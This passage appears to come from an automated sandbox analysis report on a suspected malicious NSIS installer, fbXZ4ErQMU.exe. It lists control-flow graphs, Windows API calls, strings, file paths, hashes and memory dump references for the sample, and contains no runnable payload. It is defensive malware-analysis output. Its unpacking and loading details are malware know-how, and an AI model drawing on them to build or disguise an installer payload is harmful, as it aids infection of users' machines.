RegisterClassA 196->200 201 403b69-403b9a DialogBoxParamA call 40140b call 40385a 196->201 197->176 200->201 201->174
                                                          APIs
                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75A53410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\fbXZ4ErQMU.exe",00000000), ref: 00403985
                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75A53410), ref: 004039FA
                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                          • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                          • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 1975747703-3938786335
                                                          • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                          • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                          • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                          • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                          Function 00402EA1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 208 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 211 402ef1-402ef6 208->211 212 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 208->212 213 4030d1-4030d5 211->213 220 403014-403022 call 402e3d 212->220 221 402f2f 212->221 227 403024-403027 220->227 228 403077-40307c 220->228 223 402f34-402f4b 221->223 225 402f4d 223->225 226 402f4f-402f58 call 4032ea 223->226 225->226 233 40307e-403086 call 402e3d 226->233 234 402f5e-402f65 226->234 230 403029-403041 call 403300 call 4032ea 227->230 231 40304b-403075 GlobalAlloc call 403300 call 4030d8 227->231 228->213 230->228 255 403043-403049 230->255 231->228 259 403088-403099 231->259 233->228 237 402fe1-402fe5 234->237 238 402f67-402f7b call 405c4b 234->238 245 402fe7-402fee call 402e3d 237->245 246 402fef-402ff5 237->246 238->246 257 402f7d-402f84 238->257 245->246 248 403004-40300c 246->248 249 402ff7-403001 call 4065b7 246->249 248->223 258 403012 248->258 249->248 255->228 255->231 257->246 261 402f86-402f8d 257->261 258->220 262 4030a1-4030a6 259->262 263 40309b 259->263 261->246 264 402f8f-402f96 261->264 265 4030a7-4030ad 262->265 263->262 264->246 266 402f98-402f9f 264->266 265->265 267 4030af-4030ca SetFilePointer call 405c4b 265->267 266->246 268 402fa1-402fc1 266->268 270 4030cf 267->270 268->228 271 402fc7-402fcb 268->271 270->213 272 402fd3-402fdb 271->272 273 402fcd-402fd1 271->273 272->246 274 402fdd-402fdf 272->274 273->258 273->272 274->246
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402EB2
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fbXZ4ErQMU.exe,00000400), ref: 00402ECE
                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00405C94
                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fbXZ4ErQMU.exe,C:\Users\user\Desktop\fbXZ4ErQMU.exe,80000000,00000003), ref: 00402F1A
                                                          • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\fbXZ4ErQMU.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fbXZ4ErQMU.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 2803837635-2421357064
                                                          • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                          • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                          • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                          Function 0040618A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 496 40618a-406195 497 406197-4061a6 496->497 498 4061a8-4061be 496->498 497->498 499 4061c4-4061cf 498->499 500 4063af-4063b3 498->500 499->500 503 4061d5-4061dc 499->503 501 4061e1-4061eb 500->501 502 4063b9-4063c3 500->502 501->502 504 4061f1-4061f8 501->504 505 4063c5-4063c9 call 4060f7 502->505 506 4063ce-4063cf 502->506 503->500 507 4063a2 504->507 508 4061fe-406232 504->508 505->506 510 4063a4-4063aa 507->510 511 4063ac-4063ae 507->511 512 406238-406242 508->512 513 40634f-406352 508->513 510->500 511->500 514 406244-406248 512->514 515 40625c 512->515 516 406382-406385 513->516 517 406354-406357 513->517 514->515 518 40624a-40624e 514->518 521 406263-40626a 515->521 522 406393-4063a0 lstrlenA 516->522 523 406387-40638e call 40618a 516->523 519 406367-406373 call 4060f7 517->519 520 406359-406365 call 406055 517->520 518->515 525 406250-406254 518->525 534 406378-40637e 519->534 520->534 527 40626c-40626e 521->527 528 40626f-406271 521->528 522->500 523->522 525->515 530 406256-40625a 525->530 527->528 532 406273-40628e call 405fde 528->532 533 4062aa-4062ad 528->533 530->521 542 406293-406296 532->542 535 4062bd-4062c0 533->535 536 4062af-4062bb GetSystemDirectoryA 533->536 534->522 538 406380 534->538 540 4062c2-4062d0 GetWindowsDirectoryA 535->540 541 40632d-40632f 535->541 539 406331-406334 536->539 543 406347-40634d call 4063d2 538->543 539->543 544 406336-40633a 539->544 540->541 541->539 546 4062d2-4062dc 541->546 542->544 547 40629c-4062a5 call 40618a 542->547 543->522 544->543 549 40633c-406342 lstrcatA 544->549 551 4062f6-40630c SHGetSpecialFolderLocation 546->551 552 4062de-4062e1 546->552 547->539 549->543 555 40632a 551->555 556 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 551->556 552->551 554 4062e3-4062ea 552->554 557 4062f2-4062f4 554->557 555->541 556->539 556->555 557->539 557->551
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                          • SHGetSpecialFolderLocation.SHELL32(00405256,75A523A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                          • SHGetPathFromIDListA.SHELL32(75A523A0,Call), ref: 00406312
                                                          • CoTaskMemFree.OLE32(75A523A0), ref: 0040631E
                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                          • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,75A523A0), ref: 00406394
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: /!s$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-3905095102
                                                          • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                          • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                          • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                          • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                          Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 627 401759-40177c call 402bce call 405afc 632 401786-401798 call 4060f7 call 405a8f lstrcatA 627->632 633 40177e-401784 call 4060f7 627->633 638 40179d-4017a3 call 4063d2 632->638 633->638 643 4017a8-4017ac 638->643 644 4017ae-4017b8 call 40646b 643->644 645 4017df-4017e2 643->645 652 4017ca-4017dc 644->652 653 4017ba-4017c8 CompareFileTime 644->653 647 4017e4-4017e5 call 405c6b 645->647 648 4017ea-401806 call 405c90 645->648 647->648 655 401808-40180b 648->655 656 40187e-4018a7 call 40521e call 4030d8 648->656 652->645 653->652 657 401860-40186a call 40521e 655->657 658 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 655->658 670 4018a9-4018ad 656->670 671 4018af-4018bb SetFileTime 656->671 668 401873-401879 657->668 658->643 692 401855-401856 658->692 672 402a63 668->672 670->671 674 4018c1-4018cc CloseHandle 670->674 671->674 675 402a65-402a69 672->675 677 4018d2-4018d5 674->677 678 402a5a-402a5d 674->678 680 4018d7-4018e8 call 40618a lstrcatA 677->680 681 4018ea-4018ed call 40618a 677->681 678->672 685 4018f2-402382 680->685 681->685 690 402387-40238c 685->690 691 402382 call 405813 685->691 690->675 691->690 692->668 693 401858-401859 692->693 693->657
                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,hyaenic Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,75A523A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,75A523A0), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp$C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                          • API String ID: 1941528284-414672722
                                                          • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                          • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                          • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                          • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                          Function 004030D8 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 694 4030d8-4030ec 695 4030f5-4030fe 694->695 696 4030ee 694->696 697 403100 695->697 698 403107-40310c 695->698 696->695 697->698 699 40311c-403129 call 4032ea 698->699 700 40310e-403117 call 403300 698->700 704 4032d8 699->704 705 40312f-403133 699->705 700->699 706 4032da-4032db 704->706 707 403283-403285 705->707 708 403139-403182 GetTickCount 705->708 711 4032e3-4032e7 706->711 709 4032c5-4032c8 707->709 710 403287-40328a 707->710 712 4032e0 708->712 713 403188-403190 708->713 717 4032ca 709->717 718 4032cd-4032d6 call 4032ea 709->718 710->712 714 40328c 710->714 712->711 715 403192 713->715 716 403195-4031a3 call 4032ea 713->716 719 40328f-403295 714->719 715->716 716->704 728 4031a9-4031b2 716->728 717->718 718->704 726 4032dd 718->726 723 403297 719->723 724 403299-4032a7 call 4032ea 719->724 723->724 724->704 731 4032a9-4032b5 call 405d37 724->731 726->712 730 4031b8-4031d8 call 406625 728->730 736 40327b-40327d 730->736 737 4031de-4031f1 GetTickCount 730->737 738 4032b7-4032c1 731->738 739 40327f-403281 731->739 736->706 740 4031f3-4031fb 737->740 741 403236-403238 737->741 738->719 744 4032c3 738->744 739->706 745 403203-403233 MulDiv wsprintfA call 40521e 740->745 746 4031fd-403201 740->746 742 40323a-40323e 741->742 743 40326f-403273 741->743 748 403240-403247 call 405d37 742->748 749 403255-403260 742->749 743->713 750 403279 743->750 744->712 745->741 746->741 746->745 754 40324c-40324e 748->754 753 403263-403267 749->753 750->712 753->730 755 40326d 753->755 754->739 756 403250-403253 754->756 755->712 756->753
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: ... %d%%$HBB
                                                          • API String ID: 551687249-372310663
                                                          • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                          • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                          • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                          Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E38
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                          • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Calibri
                                                          • API String ID: 3808545654-1409258342
                                                          • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                          • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                          • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                          • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C
                                                          Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 770 4056e4-40572f CreateDirectoryA 771 405731-405733 770->771 772 405735-405742 GetLastError 770->772 773 40575c-40575e 771->773 772->773 774 405744-405758 SetFileSecurityA 772->774 774->771 775 40575a GetLastError 774->775 775->773
                                                          APIs
                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                          • GetLastError.KERNEL32 ref: 0040573B
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                          • GetLastError.KERNEL32 ref: 0040575A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                          • C:\Users\user\Desktop, xrefs: 004056E4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                          • API String ID: 3449924974-26219170
                                                          • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                          • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                          • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                          Function 00406492 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 776 406492-4064b2 GetSystemDirectoryA 777 4064b4 776->777 778 4064b6-4064b8 776->778 777->778 779 4064c8-4064ca 778->779 780 4064ba-4064c2 778->780 781 4064cb-4064fd wsprintfA LoadLibraryExA 779->781 780->779 782 4064c4-4064c6 780->782 782->781
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                          • wsprintfA.USER32 ref: 004064E2
                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.53290861252.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.53290796457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290912782.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53290961705.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.53291232127.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fbXZ4ErQMU.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%s.dll$UXTHEME$\
                                                          • API String ID: 2200240437-4240819195
                                                          • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                          • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                          • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                          Function 00405CBF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
